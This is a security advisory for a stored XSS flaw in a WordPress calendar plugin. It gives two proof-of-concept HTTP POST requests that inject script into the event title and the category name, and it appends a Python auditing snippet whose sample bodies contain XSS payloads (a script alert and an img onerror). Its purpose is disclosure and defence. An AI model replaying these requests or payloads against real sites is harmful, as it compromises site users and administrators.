This WordPress plugin allows remote authenticated users, even without the unfiltered_html capability, to execute JavaScript code through a stored XSS attack. By default the plugin is available to users with contributor or higher privileges.
POC 1
You can inject JavaScript code into the event title when creating it:
POST /wordpress/wp-admin/admin.php?page=calendar HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=calendar&action=delete&event_id=3&_wpnonce=cc7cb5ade4
Content-Type: application/x-www-form-urlencoded
Content-Length: 375
Connection: close

action=add&event_id=&_wpnonce=4c75b15fa6&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar%26action%3Ddelete%26event_id%3D3%26_wpnonce%3Dcc7cb5ade4&event_title=%[XSS]&event_desc=test&event_category=1&event_link=&event_begin=2018-10-30&event_end=2018-10-30&event_time=21%3A24&event_repeats=0&event_recur=S&save=Save+%C2%BB
POC 2
You can inject JavaScript code into the category name when creating it:
POST /wordpress/wp-admin/admin.php?page=calendar-categories HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer:
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close

mode=add&category_id=&_wpnonce=fc2e4e9618&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar-categories&category_name=[XSS]&category_colour=&save=Save+%C2%BB
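As an added example that is not part of the advisory or the plugin's code, the Python below audits form bodies shaped like the two POCs above: it flags the two fields the advisory identifies (event_title, category_name) when they carry markup, and shows the two defensive layers the plugin lacks, stripping tags before storage and escaping on output. Field names are taken from the requests above; the payloads and nonces in the sample bodies are constructed placeholders.

```python
import re
from html import escape
from urllib.parse import parse_qs

# Constructed sample bodies modelled on the advisory's two POCs.
# Nonces and payloads are placeholders, not values from the original page.
SAMPLE_BODIES = {
    "add_event": ("action=add&event_id=&_wpnonce=PLACEHOLDER"
                  "&event_title=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
                  "&event_desc=test&event_category=1&event_begin=2018-10-30"
                  "&event_end=2018-10-30&save=Save"),
    "add_category": ("mode=add&category_id=&_wpnonce=PLACEHOLDER"
                     "&category_name=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E"
                     "&category_colour=&save=Save"),
    "benign_event": ("action=add&event_id=&event_title=Team+meeting"
                     "&event_desc=weekly&event_category=1&save=Save"),
}

# The two fields the advisory reports as stored without sanitisation.
UNTRUSTED_FIELDS = ("event_title", "category_name")
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")

def parse_body(body):
    """Decode an application/x-www-form-urlencoded body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def flag_markup(fields):
    """Names of untrusted fields whose submitted value contains an HTML tag."""
    return [f for f in UNTRUSTED_FIELDS if f in fields and TAG_RE.search(fields[f])]

def sanitize_for_storage(value):
    """Strip tags before storing (same intent as WordPress sanitize_text_field())."""
    return re.sub(r"<[^>]*>", "", value).strip()

def render_for_html(value):
    """Escape on output so a stored title or category name is never parsed as markup."""
    return escape(value, quote=True)

def audit(body):
    """Flag markup in the untrusted fields and show the sanitised and escaped forms."""
    fields = parse_body(body)
    present = [f for f in UNTRUSTED_FIELDS if f in fields]
    return {
        "flagged": flag_markup(fields),
        "stored": {f: sanitize_for_storage(fields[f]) for f in present},
        "rendered": {f: render_for_html(fields[f]) for f in present},
    }
```

Running `audit()` over the three sample bodies flags only the two crafted ones; a benign title passes both layers unchanged.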